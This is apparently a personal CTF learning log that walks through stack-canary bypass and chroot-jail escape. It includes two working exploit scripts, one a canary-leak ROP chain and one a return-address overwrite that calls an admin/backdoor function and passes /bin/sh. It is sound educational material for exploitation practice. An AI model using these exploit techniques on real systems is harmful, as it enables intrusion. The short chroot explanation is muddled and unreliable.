Pwn Day 17
My current challenge is bypassing a canary
My canary sits 136 bytes away from my input and my return address is 160
Usually I can do this with a leak by exploiting printf and then doing a ROP back to the beginning of the function. But it looks like I can also exploit the strstr function in my program
strstr will return a pointer to the string I am searching for
So if I can meet what it is looking for already I can return back to my original address. It does all the work for me
#!/usr/bin/python3
from pwn import *
import sys
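context.log_level = 'DEBUG'
context(os='linux', arch='amd64')
exe = './chal'
e = context.binary = ELF(exe, checksec=False)
# libc is loaded for reference only; nothing below reads from it.
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

# Run ./chal under gdb. The breakpoint offset into challenge() is presumably
# specific to this build of the binary.
p = e.debug(gdbscript='''
source /home/nick/global/halfdisp.py
break *challenge+2135
c
'''
)

# Round 1: a short, well-formed payload. The program then prints its own
# stack canary and the address of win_authed(); both are read back here.
# Those two disclosures are what the rest of the script depends on: a stack
# protector and PIE stop being mitigations once their values are printed.
p.recvuntil(b"Payload size:")
p.sendline(b"20")
p.recvuntil(b"Send your payload (up to 20 bytes)!")
p.send(b"RREPEAT")
p.recvuntil(b"the canary value is now ")
leak_canary = p.recvline()
p.recvuntil(b"the address of win_authed() is ")
leak_win = p.recvline()

# Each leaked line is hex text followed by "." and a newline; drop both
# before parsing (the original stripped "\n" and then "." separately).
leak_win = leak_win.strip(b".\n")
# The "pop rdi; ret" gadget is presumably 0xb09 bytes past win_authed() in
# this build, so it is derived from the leak rather than a static search
# (the earlier ROP(e)/find_gadget result was never used).
leak_pop_rdi = int(leak_win, 16) + 0xb09
leak_win = p64(int(leak_win, 16))
leak_canary = leak_canary.strip(b".\n")
leak_canary = p64(int(leak_canary, 16))
print("Packed Address (Hex):", leak_canary.hex())

# Round 2: oversized payload (the prompt text here has a trailing space,
# unlike the first prompt, so the two recvuntil patterns differ on purpose).
# NOTE(review): the write-up above puts the canary 136 bytes from the input
# and the return address at 160, while this layout places the canary at 137
# and the first gadget at 153 -- confirm the offsets against the binary.
p.recvuntil(b"Payload size: ")
p.send(b"360")
payload = flat([
    b"\x90"*137,          # filler up to the canary slot
    leak_canary,          # leaked canary, written back unchanged
    b"\x90"*8,            # filler between the canary and the saved return address
    p64(leak_pop_rdi),    # pop rdi; ret
    p64(0x1337),          # rdi -- presumably the argument win_authed() checks
    leak_win              # win_authed()
])
p.send(payload)
p.interactive()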
Time to move on to sandboxing
chroot into a jail, then I need to escape from that jail
Chroot changes the reference of / to the absolute location of /tmp/jail
To escape the jail one traditional technique is simply doing
../../../../../../../
This is because / alone will not be enough
Overall chroot is a way to break out of UID
Time to move onto a chal
import interact
import struct
# Pack integer 'n' into an 8-byte representation
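def p64(n):
    """Pack the integer `n` into 8 little-endian bytes.

    Args:
        n: value with 0 <= n < 2**64.

    Returns:
        A `bytes` object of length 8.

    Raises:
        struct.error: if `n` does not fit in an unsigned 64-bit field.
    """
    # Explicit little-endian ('<Q') rather than native ('Q'), so the packing
    # does not depend on the byte order of the host running this script.
    return struct.pack('<Q', n)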
# Unpack the 8-byte string 's' into a Python integer
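def u64(s):
    """Unpack exactly 8 little-endian bytes `s` into an unsigned integer.

    Args:
        s: a bytes-like object of length 8.

    Returns:
        The integer value, 0 <= value < 2**64.

    Raises:
        struct.error: if `s` is not exactly 8 bytes long.
    """
    # '<Q' pins little-endian decoding independent of the host byte order,
    # mirroring p64().
    return struct.unpack('<Q', s)[0]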
p = interact.Process()
# Fixed code addresses for this binary. No leak is performed, so the target
# is presumably loaded at a constant base (non-PIE) -- confirm with checksec.
login_as_admin = p64(0x400bce)
backdoor= p64(0x400b8a)
# p.readuntil("Enter choice:")
# Everything below is sent blind with no reads in between; the commented-out
# readuntil suggests each numeric line answers an "Enter choice:" menu prompt.
# NOTE(review): sendline() is given both bytes and str arguments in this run;
# the interact wrapper presumably accepts both -- confirm, or use bytes throughout.
p.sendline(b"1")
# 148 bytes of filler followed by a packed address; no canary value is part
# of this payload. Presumably the saved return address is what gets replaced
# -- the offset is not derived anywhere in this script.
p.sendline(b"\x90"*148+login_as_admin)
p.sendline("")
p.sendline(b"3")
p.sendline(b"")
p.sendline(b"2")
# Hard-coded credential string sent as-is.
p.sendline("l0ln0onewillguessth1s")
p.sendline("")
p.sendline(b"0")
p.sendline(b"1")
p.sendline(b"/bin/sh")
p.sendline(b"1")
# Same 148-byte layout as above, this time followed by the backdoor address.
p.sendline(b"\x90"*148+backdoor)
p.sendline("")
p.sendline(b"4")
p.sendline("")
p.sendline("2")
p.interactive()